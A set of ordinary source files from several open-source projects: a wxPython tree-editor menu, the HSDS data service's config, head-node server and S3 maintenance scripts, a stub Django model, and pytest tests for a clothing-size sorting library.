"Add a new node as an immediate sibling (same level) of the current selection"
),
)
self.Append(sibling)
self.Bind(wx.EVT_MENU, self.OnSibling, sibling)
def OnChild(self, event):
return self.parent.DoAddChild()
def OnParent(self, event):
return self.parent.DoAddParent()
def OnSibling(self, event):
return self.parent.DoAddSibling()
class PasteDestMenu(wx.Menu):
def __init__(self, parent, event):
super().__init__()
self.parent = parent
self.event = event
child = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &child"),
# Translators: Help text in the paste pop-up menu.
_("Paste as an immediate child of the current selection"),
)
self.Append(child)
self.Bind(wx.EVT_MENU, self.OnChild, child)
parent = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &parent"),
# Translators: Help text in the paste pop-up menu.
_("Merge the pasteboard with the current selection."),
)
self.Append(parent)
self.Bind(wx.EVT_MENU, self.OnParent, parent)
if self.parent.tree.selection != self.parent.tree.root:
sibling = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An option in the paste pop-up menu.
_("As &sibling"),
_(
# Translators: Help text in the paste pop-up menu.
"Paste as an immediate sibling (same level) of the current selection"
),
)
self.Append(sibling)
self.Bind(wx.EVT_MENU, self.OnSibling, sibling)
def OnChild(self, event):
return self.parent.PasteChild(self.event)
def OnParent(self, event):
return self.parent.PasteParent(self.event)
def OnSibling(self, event):
return self.parent.PasteSibling(self.event)
class NodeContextMenu(wx.Menu):
def __init__(self, parent):
super().__init__()
self.parent = parent
addSubmenu = AddNodeMenu(parent)
self.AppendSubMenu(
addSubmenu,
# Translators: An item in the node context (shift+f10) menu.
_("&Add node"),
help=_(
# Translators: Help text in the node context (shift+F10) menu.
"Add a new node relative to the current selection."
),
)
edit = wx.MenuItem(
self,
wx.ID_EDIT,
# Translators: An item in the node context (shift+f10) menu.
_("Edit node...\tF2"),
# Translators: Help text in the node context (shift+F10) menu.
_("Edit the currently selected node."),
)
self.Append(edit)
up = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An item in the node context (shift+f10) menu.
_("Move up\tAlt+up"),
# Translators: Help text in the node context (shift+F10) menu.
_("Move subtree to previous position in parent."),
)
self.Append(up)
self.Bind(wx.EVT_MENU, self.OnUp, up)
dn = wx.MenuItem(
self,
wx.ID_ANY,
# Translators: An item in the node context (shift+f10) menu.
_("Move down\tAlt+down"),
# Translators: Help text in the node context (shift+F10) menu.
_("Move subtree to next position in parent."),
)
self.Append(dn)
self.Bind(wx.EVT_MENU, self.OnDn, dn)
delsubtree = wx.MenuItem(
self,
wx.ID_DELETE,
# Translators: An item in the node context (shift+f10) menu.
_("&Delete subtree\tDEL"),
# Translators: Help text in the node context (shift+F10) menu.
_("Delete this node and all of its descendants."),
)
self.Append(delsubtree)
def OnUp(self, event):
return self.parent.OnMoveUp(event)
def OnDn(self, event):
return self.parent.OnMoveDown(event)
``` |
{
"source": "JonosGit/hsds",
"score": 2
} |
#### File: hsds/hsds/config.py
```python
import os
import sys
cfg = {
'allow_noauth': True, # enable unauthenticated requests
'default_public': False, # new domains are publically readable by default
'aws_access_key_id': 'xxx', # Replace with access key for account
'aws_secret_access_key': 'xxx', # Replace with secret key for account
'aws_iam_role': "hsds_role", # For EC2 using IAM roles
'aws_region': 'us-east-1',
'hsds_endpoint': '', # used for hateos links in response
'head_endpoint': '', # optionally used for nodes to register
'aws_s3_gateway': '', # use endpoint for the region HSDS is running in, e.g. 'https://s3.amazonaws.com' for us-east-1
'aws_dynamodb_gateway': 'https://dynamodb.us-east-1.amazonaws.com',
'aws_dynamodb_users_table': '',
'password_salt': '',
'bucket_name': '', # set to usee a default bucket, otherwise bucket param is needed for all requests
'head_host': 'localhost',
'head_port': 5100,
'dn_host': 'localhost',
'dn_port' : 6101, # Start dn ports at 6101
'sn_port': 5101, # Start sn ports at 5101
'target_sn_count': 4,
'target_dn_count': 4,
'log_level': 'INFO', # ERROR, WARNING, INFO, DEBUG, or NOTSET,
'max_tcp_connections': 100,
'head_sleep_time': 10,
'node_sleep_time': 10,
'async_sleep_time': 10,
's3_sync_interval': 10, # time to wait to write object data to S3 (in sec)
'max_chunks_per_request': 2500, # maximum number of chunks to be serviced by one request
'min_chunk_size': '1m', # 1 MB
'max_chunk_size': '4m', # 4 MB
'max_request_size': '100m', # 100 MB - should be no smaller than client_max_body_size in nginx tmpl
'max_chunks_per_folder': 200000, # max number of chunks per s3 folder. 0 for unlimiited
'max_task_count': 100, # maximum number of concurrent tasks before server will return 503 error
'aio_max_pool_connections': 64, # number of connections to keep in conection pool for aiobotocore requests
'metadata_mem_cache_size': '128m',
'chunk_mem_cache_size': '128m', # 128 MB
'timeout': 30, # http timeout - 30 sec
'password_file': '/usr/local/src/hsds/passwd.txt', # filepath to a text file of username/passwords. set to '' for no-auth access
'server_name': 'Highly Scalable Data Service (HSDS)', # this gets returned in the about request
'greeting': 'Welcome to HSDS!',
'about': 'HSDS is a webservice for HDF data',
'top_level_domains': [] # list of possible top-level domains, example: ["/home", "/shared"]
}
def get(x):
# see if there is a command-line override
#print("config get:", x)
option = '--'+x+'='
retval = None
for i in range(1, len(sys.argv)):
#print(i, sys.argv[i])
if sys.argv[i].startswith(option):
# found an override
arg = sys.argv[i]
retval = arg[len(option):] # return text after option string
# see if there are an environment variable override
if not retval and x.upper() in os.environ:
retval = os.environ[x.upper()]
# no command line override, just return the cfg value
if not retval and x in cfg:
retval = cfg[x]
if isinstance(retval, str) and len(retval) > 1 and retval[-1] in ('g', 'm', 'k') and retval[:-1].isdigit():
# convert values like 512m to corresponding integer
u = retval[-1]
n = int(retval[:-1])
if u == 'k':
retval = n * 1024
elif u == 'm':
retval = n * 1024*1024
else: # u == 'g'
retval = n * 1024*1024*1024
return retval
```
#### File: hsds/hsds/headnode.py
```python
import asyncio
import json
import time
from aiohttp.web import Application, StreamResponse, run_app, json_response
from aiohttp import ClientSession, TCPConnector
from aiohttp.web_exceptions import HTTPBadRequest, HTTPInternalServerError
from asyncio import TimeoutError
import aiobotocore
import config
from util.timeUtil import unixTimeToUTC, elapsedTime
from util.httpUtil import http_get, getUrl
from util.idUtil import createNodeId
import hsds_logger as log
NODE_STAT_KEYS = ("cpu", "diskio", "memory", "log_stats", "disk", "netio",
"req_count", "s3_stats", "chunk_cache_stats")
async def healthCheck(app):
""" Periodic method that pings each active node and verifies it is still healthy.
If node doesn't respond, free up the node slot (the node can re-register if it comes back)'"""
app["last_health_check"] = int(time.time())
nodes = app["nodes"]
while True:
# sleep for a bit
sleep_secs = config.get("head_sleep_time")
await asyncio.sleep(sleep_secs)
now = int(time.time())
log.info("health check {}".format(unixTimeToUTC(now)))
fail_count = 0
HEALTH_CHECK_RETRY_COUNT = 1 # times to try before calling a node dead
for node in nodes:
if node["host"] is None:
fail_count += 1
continue
url = getUrl(node["host"], node["port"]) + "/info"
try:
rsp_json = await http_get(app, url)
if "node" not in rsp_json:
log.error("Unexpected response from node")
fail_count += 1
continue
node_state = rsp_json["node"]
node_id = node_state["id"]
if node_id != node['id']:
log.warn("unexpected node_id: {} (expecting: {})".format(node_id, node['id']))
node['host'] = None
node['id'] = None
fail_count += 1
continue
if 'number' in node_state and node_state['number'] != node['node_number']:
msg = "unexpected node_number got {} (expecting: {})"
log.warn(msg.format(node_state["number"], node['node_number']))
node['host'] = None
node['id'] = None
fail_count += 1
continue
# save off other useful info from the node
app_node_stats = app["node_stats"]
node_stats = {}
for k in NODE_STAT_KEYS:
node_stats[k] = rsp_json[k]
app_node_stats[node_id] = node_stats
# mark the last time we got a response from this node
node["healthcheck"] = unixTimeToUTC(int(time.time()))
node["failcount"] = 0 # rest
except OSError as ose:
log.warn("OSError for req: {}: {}".format(url, str(ose)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("node {}:{} not responding".format(node["host"], node["port"]))
fail_count += 1
except HTTPInternalServerError as hpe:
log.warn("HTTPInternalServerError for req: {}: {}".format(url, str(hpe)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("removing {}:{} from active list".format(node["host"], node["port"]))
fail_count += 1
except TimeoutError as toe:
log.warn("Timeout error for req: {}: {}".format(url, str(toe)))
# node has gone away?
node["failcount"] += 1
if node["failcount"] >= HEALTH_CHECK_RETRY_COUNT:
log.warn("removing {}:{} from active list".format(node["host"], node["port"]))
fail_count += 1
log.info("node health check fail_count: {}".format(fail_count))
if fail_count > 0:
if app["cluster_state"] == "READY":
# go back to INITIALIZING state until another node is registered
log.warn("Fail_count > 0, Setting cluster_state from READY to INITIALIZING")
app["cluster_state"] = "INITIALIZING"
elif fail_count == 0 and app["cluster_state"] != "READY":
log.info("All nodes healthy, changing cluster state to READY")
app["cluster_state"] = "READY"
async def info(request):
"""HTTP Method to return node state to caller"""
log.request(request)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
answer = {}
# copy relevant entries from state dictionary to response
answer['id'] = request.app['id']
answer['start_time'] = unixTimeToUTC(app['start_time'])
answer['last_health_check'] = unixTimeToUTC(app['last_health_check'])
answer['up_time'] = elapsedTime(app['start_time'])
answer['cluster_state'] = app['cluster_state']
answer['bucket_name'] = app['bucket_name']
answer['target_sn_count'] = getTargetNodeCount(app, "sn")
answer['active_sn_count'] = getActiveNodeCount(app, "sn")
answer['target_dn_count'] = getTargetNodeCount(app, "dn")
answer['active_dn_count'] = getActiveNodeCount(app, "dn")
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def register(request):
""" HTTP method for nodes to register with head node"""
log.request(request)
app = request.app
text = await request.text()
# body = await request.json()
body = json.loads(text)
log.info("body: {}".format(body))
if 'id' not in body:
msg = "Missing 'id'"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
if 'port' not in body:
msg = "missing key 'port'"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
if 'node_type' not in body:
raise HTTPBadRequest(reason="missing key 'node_type'")
if body['node_type'] not in ('sn', 'dn'):
msg="invalid node_type"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
peername = request.transport.get_extra_info('peername')
if peername is None:
raise HTTPBadRequest(reason="Can not determine caller IP")
host, req_port = peername
log.info("register host: {}, port: {}".format(host, req_port))
nodes = None
ret_node = None
node_ids = app['node_ids']
if body['id'] in node_ids:
# already registered?
ret_node = node_ids[body['id']]
else:
nodes = app['nodes']
for node in nodes:
if node['host'] is None and node['node_type'] == body['node_type']:
# found a free node
log.info("got free node: {}".format(node))
node['host'] = host
node['port'] = body["port"]
node['id'] = body["id"]
node["connected"] = unixTimeToUTC(int(time.time()))
node['failcount'] = 0
ret_node = node
node_ids[body["id"]] = ret_node
break
if ret_node is None:
log.info("no free node to assign")
inactive_node_count = getInactiveNodeCount(app)
log.info("inactive_node_count: {}".format(inactive_node_count))
if inactive_node_count == 0:
# all the nodes have checked in
log.info("setting cluster state to ready")
app['cluster_state'] = "READY"
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
answer = {}
if ret_node is not None:
answer["node_number"] = ret_node["node_number"]
else:
# all nodes allocated, let caller know it's in the reserve pool
answer["node_number"] = -1
answer["node_count"] = app["target_dn_count"]
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def nodestate(request):
"""HTTP method to return information about registed nodes"""
log.request(request)
node_type = request.match_info.get('nodetype', '*')
node_number = '*'
if node_type != '*':
node_number = request.match_info.get('nodenumber', '*')
log.info("nodestate/{}/{}".format(node_type, node_number))
if node_type not in ("sn", "dn", "*"):
msg="invalid node_type"
log.response(request, code=400, message=msg)
raise HTTPBadRequest(reason=msg)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
if node_number == '*':
nodes = []
for node in app["nodes"]:
if node["node_type"] == node_type or node_type == "*":
nodes.append(node)
answer = {"nodes": nodes }
else:
answer = {}
for node in app["nodes"]:
if node["node_type"] == node_type and str(node["node_number"]) == node_number:
answer = node
break
answer["cluster_state"] = app["cluster_state"]
resp = json_response(answer)
log.response(request, resp=resp)
return resp
async def nodeinfo(request):
"""HTTP method to return node stats (cpu usage, request count, errors, etc.) about registed nodes"""
log.request(request)
node_stat_keys = NODE_STAT_KEYS
stat_key = request.match_info.get('statkey', '*')
if stat_key != '*':
if stat_key not in node_stat_keys:
raise HTTPBadRequest(reason="invalid key: {}".format(stat_key))
node_stat_keys = (stat_key,)
app = request.app
resp = StreamResponse()
resp.headers['Content-Type'] = 'application/json'
app_node_stats = app["node_stats"]
dn_count = app['target_dn_count']
sn_count = app['target_sn_count']
answer = {}
# re-assemble the individual node stats to arrays indexed by node number
for stat_key in node_stat_keys:
log.info("stat_key: {}".format(stat_key))
stats = {}
for node in app["nodes"]:
node_number = node["node_number"]
node_type = node["node_type"]
if node_type not in ("sn", "dn"):
log.error("unexpected node_type: {}".format(node_type))
continue
node_id = node["id"]
log.info("app_node_stats: {}".format(app_node_stats))
if node_id not in app_node_stats:
log.info("node_id: {} not found in node_stats".format(node_id))
continue
node_stats = app_node_stats[node_id]
if stat_key not in node_stats:
log.info("key: {} not found in node_stats for node_id: {}".format(stat_key, node_id))
continue
stats_field = node_stats[stat_key]
for k in stats_field:
if k not in stats:
stats[k] = {}
stats[k]["sn"] = [0,] * sn_count
stats[k]["dn"] = [0,] * dn_count
stats[k][node_type][node_number] = stats_field[k]
answer[stat_key] = stats
resp = json_response(answer)
log.response(request, resp=resp)
return resp
def getTargetNodeCount(app, node_type):
count = None
if node_type == "dn":
count = app['target_dn_count']
elif node_type == "sn":
count = app['target_sn_count']
return count
def getActiveNodeCount(app, node_type):
count = 0
for node in app['nodes']:
if node["node_type"] == node_type and node["host"] is not None:
count += 1
return count
def getInactiveNodeCount(app):
count = 0
for node in app['nodes']:
if node['host'] is None:
count += 1
return count
async def init(loop):
"""Intitialize application and return app object"""
app = Application(loop=loop)
# set a bunch of global state
app["id"] = createNodeId("head")
app["cluster_state"] = "INITIALIZING"
app["start_time"] = int(time.time()) # seconds after epoch
app["target_sn_count"] = int(config.get("target_sn_count"))
app["target_dn_count"] = int(config.get("target_dn_count"))
log.info("target_sn_count: {}".format(app["target_sn_count"]))
log.info("target_dn_count: {}".format(app["target_dn_count"]))
bucket_name = config.get("bucket_name")
if bucket_name:
log.info("using bucket: {}".format(bucket_name))
app["bucket_name"] = bucket_name
else:
log.info("No default bucket name is set")
app["head_host"] = config.get("head_host")
app["head_port"] = config.get("head_port")
nodes = []
for node_type in ("dn", "sn"):
target_count = getTargetNodeCount(app, node_type)
for i in range(target_count):
node = {"node_number": i,
"node_type": node_type,
"host": None,
"port": None,
"id": None }
nodes.append(node)
app["nodes"] = nodes
app["node_stats"] = {} # stats retuned by node/info request. Keyed by node id
app["node_ids"] = {} # dictionary to look up node by id
app.router.add_get('/', info)
app.router.add_get('/nodestate', nodestate)
app.router.add_get('/nodestate/{nodetype}', nodestate)
app.router.add_get('/nodestate/{nodetype}/{nodenumber}', nodestate)
app.router.add_get('/nodeinfo', nodeinfo)
app.router.add_get('/nodeinfo/{statkey}', nodeinfo)
app.router.add_get('/info', info)
app.router.add_post('/register', register)
return app
#
# Main
#
if __name__ == '__main__':
loop = asyncio.get_event_loop()
app = loop.run_until_complete(init(loop))
# create a client Session here so that all client requests
# will share the same connection pool
max_tcp_connections = int(config.get("max_tcp_connections"))
app['client'] = ClientSession(loop=loop, connector=TCPConnector(limit=max_tcp_connections))
session = aiobotocore.get_session(loop=loop)
app["session"] = session
app["loop"] = loop
asyncio.ensure_future(healthCheck(app), loop=loop)
head_port = config.get("head_port")
log.info("Starting service on port: {}".format(head_port))
log.debug("debug test")
run_app(app, port=int(head_port))
```
#### File: hsds/tools/bucket_scan.py
```python
import asyncio
import sys
from aiobotocore import get_session
from aiohttp.web_exceptions import HTTPNotFound, HTTPInternalServerError
from util.s3Util import releaseClient, getS3Keys, getS3JSONObj
from util.idUtil import getObjId
from async_lib import scanRoot
import config
import hsds_logger as log
# List all root keys and create/update info.json
# Note: only works with schema v2 domains!
async def getS3RootKeysCallback(app, s3keys):
log.info(f"getS3RootKeysCallback, {len(s3keys)} items")
if not isinstance(s3keys, list):
log.error("expected list result for s3keys callback")
raise ValueError("unexpected callback format")
results = app["bucket_scan"]
for s3key in s3keys:
log.info(f"got key: {s3key}")
if not s3key.startswith("db/") or s3key[-1] != '/':
log.error(f"unexpected key for getS3RootKeysCallback: {s3key}")
continue
root_id = getObjId(s3key + ".group.json")
log.info(f"root_id: {root_id}")
results["root_count"] += 1
info_key = s3key + ".info.json"
if app["scanRootKeys_update"]:
log.info("updating...")
await scanRoot(app, root_id, update=True)
info_obj = None
try:
info_obj = await getS3JSONObj(app, info_key)
except HTTPNotFound:
pass # info.json not created yet
except HTTPInternalServerError as ie:
log.warn(f"error getting s3obj: {ie}")
continue
if info_obj:
log.info(f"got obj: {info_obj}")
results["info_count"] += 1
results["group_count"] += info_obj["num_groups"]
results["dataset_count"] += len(info_obj["datasets"])
results["datatype_count"] += info_obj["num_datatypes"]
results["chunk_count"] += info_obj["num_chunks"]
results["allocated_bytes"] += info_obj["allocated_bytes"]
results["metadata_bytes"] += info_obj["metadata_bytes"]
async def scanRootKeys(app, update=False):
# iterate through all s3 root keys in the bucket.
#
# Note: not re-entrant! Only one scanRoot an be run at a time per app.
log.info("scanRootKeys")
app["scanRootKeys_update"] = update
await getS3Keys(app, prefix="db/", deliminator='/', include_stats=False, callback=getS3RootKeysCallback)
#
# Print usage and exit
#
def printUsage():
print(" python bucket_scan.py [--update]")
sys.exit();
async def run_scan(app, update=False):
scan_results = {}
scan_results["root_count"] = 0
scan_results["info_count"] = 0
scan_results["updated_count"] = 0
scan_results["group_count"] = 0
scan_results["dataset_count"] = 0
scan_results["datatype_count"] = 0
scan_results["chunk_count"] = 0
scan_results["allocated_bytes"] = 0
scan_results["metadata_bytes"] = 0
app["bucket_scan"] = scan_results
results = await scanRootKeys(app, update=update)
await releaseClient(app)
return results
def main():
if len(sys.argv) > 1 and (sys.argv[1] == "-h" or sys.argv[1] == "--help"):
printUsage()
if len(sys.argv) > 1 and sys.argv[1] == "--update":
do_update = True
else:
do_update = False
# we need to setup a asyncio loop to query s3
loop = asyncio.get_event_loop()
app = {}
app["bucket_name"] = config.get("bucket_name")
app["loop"] = loop
session = get_session(loop=loop)
app["session"] = session
loop.run_until_complete(run_scan(app, update=do_update))
loop.close()
results = app["bucket_scan"]
print("root_count:", results["root_count"])
print("info_count:", results["info_count"])
print("group_count", results["group_count"])
print("dataset_count:", results["dataset_count"])
print("datatype_count", results["datatype_count"])
print("chunk_count:", results["chunk_count"])
print('allocated_bytes:', results["allocated_bytes"])
print("metadata_bytes:", results["metadata_bytes"])
print("updated_count:", results["updated_count"])
print("done!")
main()
```
#### File: hsds/tools/root_delete.py
```python
import asyncio
import sys
from aiobotocore import get_session
from util.idUtil import isValidUuid,isSchema2Id
from util.s3Util import releaseClient
from async_lib import removeKeys
import config
# This is a utility to remove all keys for a given rootid
# Note: only works with schema v2 domains!
#
# Print usage and exit
#
def printUsage():
print(" python root_delete.py [rootid]")
sys.exit();
async def run_delete(app, rootid):
results = await removeKeys(app, rootid)
await releaseClient(app)
return results
def main():
if len(sys.argv) == 1 or len(sys.argv) > 1 and (sys.argv[1] == "-h" or sys.argv[1] == "--help"):
printUsage()
rootid = sys.argv[1]
if not isValidUuid(rootid):
print("Invalid root id!")
sys.exit(1)
if not isSchema2Id(rootid):
print("This tool can only be used with Schema v2 ids")
sys.exit(1)
# we need to setup a asyncio loop to query s3
loop = asyncio.get_event_loop()
app = {}
app["bucket_name"] = config.get("bucket_name")
app["loop"] = loop
session = get_session(loop=loop)
app["session"] = session
loop.run_until_complete(run_delete(app, rootid))
loop.close()
print("done!")
main()
``` |
{
"source": "Jonothompson/reflib",
"score": 2
} |
#### File: apps/library/models.py
```python
from __future__ import unicode_literals
from django.db import models
# class LibraryPictures(models.Model):
# title = models.CharField(max_length=100, blank=False, Null=False)
# uploadedPicture = models.FileField(upload_to='')
# tags = models.ManyToManyField(Tag)
#
#
# class Tag(models.Model):
# word = models.CharField(max_length=35)
# slug = models.CharField(max_length=250)
# created_at = models.DateTimeField(auto_now_add=False)
#
# def __unicode__(self):
# return self.word
``` |
{
"source": "jonovate/sizesorter",
"score": 2
} |
#### File: sizesorter/tests/test_sizechart.py
```python
import os
import sys
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if parentdir not in sys.path:
sys.path.insert(0, parentdir)
###
import pytest
from sizesorter import (
Size,
DynOp,
SizeChart,
SIZE_CHART_DEFAULTS,
DYNAMIC_OPERATIONS_DEFAULTS,
SIZE_CHART_FORMAT_DEFAULTS,
)
from sizechart_samples import (
SIZE_CHART_SIMPLE,
SIZE_CHART_BABY_TODDLER_KID_SIZES,
DYNAMIC_OPS_BABY_TODDLER_KID_SIZES,
SIZE_CHART_WOMENS_TOPS,
)
# Doesn't work with Paramterized Test Cases. https://github.com/pytest-dev/pytest/issues/349
# @pytest.fixture(scope='module',
# params=[(SIZE_CHART_DEFAULTS, None),
# (SIZE_CHART_DEFAULTS, DYNAMIC_OPERATIONS_DEFAULTS)])
# def default_size_chart(request):
# return SizeChart(*request.param)
@pytest.fixture(scope='module')
def default_size_chart():
return SizeChart(SIZE_CHART_DEFAULTS, None)
@pytest.fixture(scope='module')
def default_size_chart_and_dynops():
return SizeChart(SIZE_CHART_DEFAULTS, DYNAMIC_OPERATIONS_DEFAULTS)
def custom_dynops():
return {'A': DynOp('A', 5, -1), 'C': DynOp('C', 5, 1)}
@pytest.fixture(scope='module')
def custom_size_chart():
return SizeChart.from_simple_dict( {'A': 1, 'B': 2, 'C': 3}, custom_dynops())
@pytest.fixture(scope='module')
def baby_toddler_kids_size_chart():
#TODO -- Offset Increment
#TODO - min/max dyn ops
return SizeChart(SIZE_CHART_BABY_TODDLER_KID_SIZES, DYNAMIC_OPS_BABY_TODDLER_KID_SIZES)
SIZE_CHART_DEFAULTS
def test_class():
size_chart = SizeChart()
assert id(size_chart) > 0
assert len(SIZE_CHART_DEFAULTS) == 5 # Make sure length hasn't changed ('XS' -> 'XL')
assert len(size_chart) == len(SIZE_CHART_DEFAULTS)
dyn_ops = {'XS': DynOp('XS', 1, -1), 'XL': DynOp('XL', 1, 1)}
assert id(dyn_ops)
size = next(iter(size_chart.size_chart.values()))
assert str(size) == '{} ({})'.format(size.verbose, size.key)
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'XS', ('2XS', 'S')),
(default_size_chart, 'S', ('XS', 'M')),
(default_size_chart, 'M', ('S','L')),
(default_size_chart, 'L', ('M', 'XL')),
(default_size_chart, 'XL', ('L','2XL')),
],)
def test_class_default_double_pointers(size_chart, size_key, expected_tpl):
size = size_chart().size_chart[size_key]
assert size.previous_size_key == expected_tpl[0]
assert size.next_size_key == expected_tpl[1]
@pytest.mark.parametrize("test_case_id, expected_tpl",
[(1, (ValueError, 'of type Size')),
(2, (ValueError, 'base suffix not in size_chart')),
(3, (ValueError, 'base suffix not in size_chart')),
(4, (ValueError, 'sort_value_increment must be a positive number')),
(5, (ValueError, 'sort_value_increment must be a positive number')),
(6, (ValueError, 'growth_direction must 1 or -1')),
(7, (ValueError, 'growth_direction must 1 or -1')),
],)
def test_invalid_chart(test_case_id, expected_tpl):
bad_size_chart = {'H': 4, 'J': Size('J', 10)}
offset = {'A': DynOp('A', 25, -1), 'Z': DynOp('Z', 25, 1)}
with pytest.raises(expected_tpl[0]) as ee:
if test_case_id == 1:
SizeChart(bad_size_chart) #Wrong Dict value
del(bad_size_chart['H'])
if test_case_id == 2:
SizeChart(bad_size_chart, offset) #Missing A
bad_size_chart['A'] = Size('A', 1)
if test_case_id == 3:
SizeChart(bad_size_chart, offset) #Missing Z
bad_size_chart['Z'] = Size('Z', 26)
new_bad_offset = {'A': DynOp('A', 0, 1), 'Z': DynOp('Z', 0, -1)}
if test_case_id == 4:
SizeChart(bad_size_chart, new_bad_offset) #Bad increment
new_bad_offset['A'] = DynOp('A', 50, 1)
if test_case_id == 5:
SizeChart(bad_size_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 50, -5), 'Z': DynOp('Z', 60, 4)}
if test_case_id == 6:
SizeChart(bad_size_chart, new_bad_offset) #Bad growth
new_bad_offset['A'] = DynOp('A', 50, -1)
if test_case_id == 7:
SizeChart(bad_size_chart, new_bad_offset) #Bad growth
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("test_case_id, expected_tpl",
[(1, (ValueError, 'Size Chart dictionary values must be Numbers')),
(2, (ValueError, 'base suffix not in size_chart')),
(3, (ValueError, 'base suffix not in size_chart')),
(4, (ValueError, 'sort_value_increment must be a positive number')),
(5, (ValueError, 'sort_value_increment must be a positive number')),
(6, (ValueError, 'growth_direction must 1 or -1')),
(7, (ValueError, 'growth_direction must 1 or -1')),
],)
def test_invalid_simple_chart(test_case_id, expected_tpl):
bad_chart = {'J': 10, 'K': Size('K', 11)}
offset = {'A': DynOp('A', 25, -1), 'Z': DynOp('Z', 25, 1)}
with pytest.raises(expected_tpl[0]) as ee:
if test_case_id == 1:
SizeChart.from_simple_dict(bad_chart) #Wrong Dict Value
del(bad_chart['K'])
if test_case_id == 2:
SizeChart.from_simple_dict(bad_chart, offset) #Missing A
bad_chart['A'] = 1
if test_case_id == 3:
SizeChart.from_simple_dict(bad_chart, offset) #Missing Z
bad_chart['Z'] = 26
new_bad_offset = {'A': DynOp('A', 0, -1), 'Z': DynOp('Z', 0, 1)}
if test_case_id == 4:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 10, -1), 'Z': DynOp('Z', -5, 1)}
if test_case_id == 5:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad increment
new_bad_offset = {'A': DynOp('A', 10, -4), 'Z': DynOp('Z', 10, 4)}
if test_case_id == 6:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad growth
new_bad_offset['A'] = DynOp('A', 50, -1)
if test_case_id == 7:
SizeChart.from_simple_dict(bad_chart, new_bad_offset) #Bad growth
assert str(ee.value).find(expected_tpl[1]) > -1
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', (None)),
(default_size_chart, 'XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '1XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '-2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])), #debatable
(default_size_chart, '15XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart, '1XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, 'XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, '3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart, '+3XL',(DYNAMIC_OPERATIONS_DEFAULTS['XL'])), #debatable
(default_size_chart, '10XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, 'M', (None)),
(default_size_chart_and_dynops, 'XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '1XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, '-2XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])), #debatable
(default_size_chart_and_dynops, '15XS', (DYNAMIC_OPERATIONS_DEFAULTS['XS'])),
(default_size_chart_and_dynops, 'XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '1XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(default_size_chart_and_dynops, '+3XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])), #debatable
(default_size_chart_and_dynops, '10XL', (DYNAMIC_OPERATIONS_DEFAULTS['XL'])),
(custom_size_chart, 'B', (None)),
(custom_size_chart, 'A', (custom_dynops()['A'])),
(custom_size_chart, '1A', (custom_dynops()['A'])),
(custom_size_chart, '3A', (custom_dynops()['A'])),
(custom_size_chart, '-3A', (custom_dynops()['A'])), #debatable
(custom_size_chart, '14A', (custom_dynops()['A'])),
(custom_size_chart, '1C', (custom_dynops()['C'])),
(custom_size_chart, 'C', (custom_dynops()['C'])),
(custom_size_chart, '5C', (custom_dynops()['C'])),
(custom_size_chart, '+5C', (custom_dynops()['C'])), #debatable
(custom_size_chart, '100C', (custom_dynops()['C'])),
],)
def test_find_dynamic_operation(size_chart, size_key, expected_tpl):
assert size_chart()._find_dynamic_operation(size_key) == expected_tpl#[0] #py collapses single
#TODO - Test Verbose and XXL keys
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', ('M')),
(default_size_chart, 'XL', ('XL')),
(default_size_chart, '1XL', ('XL')),
(default_size_chart, '10XL', ('10XL')),
(default_size_chart, '11XL', ('11XL')),
(default_size_chart, '1', ('1')),
(default_size_chart, '10', ('10')),
(default_size_chart, 1, ('1')),
(default_size_chart, 10, ('10')),
],)
def test_handle_single_prefix(size_chart, size_key, expected_tpl):
assert size_chart()._handle_single_prefix(size_key) == expected_tpl#[0] Single tpls unpack
@pytest.mark.parametrize("size_chart, size_key, expected_tpl",
[(default_size_chart, 'M', ('', 'M', False)),
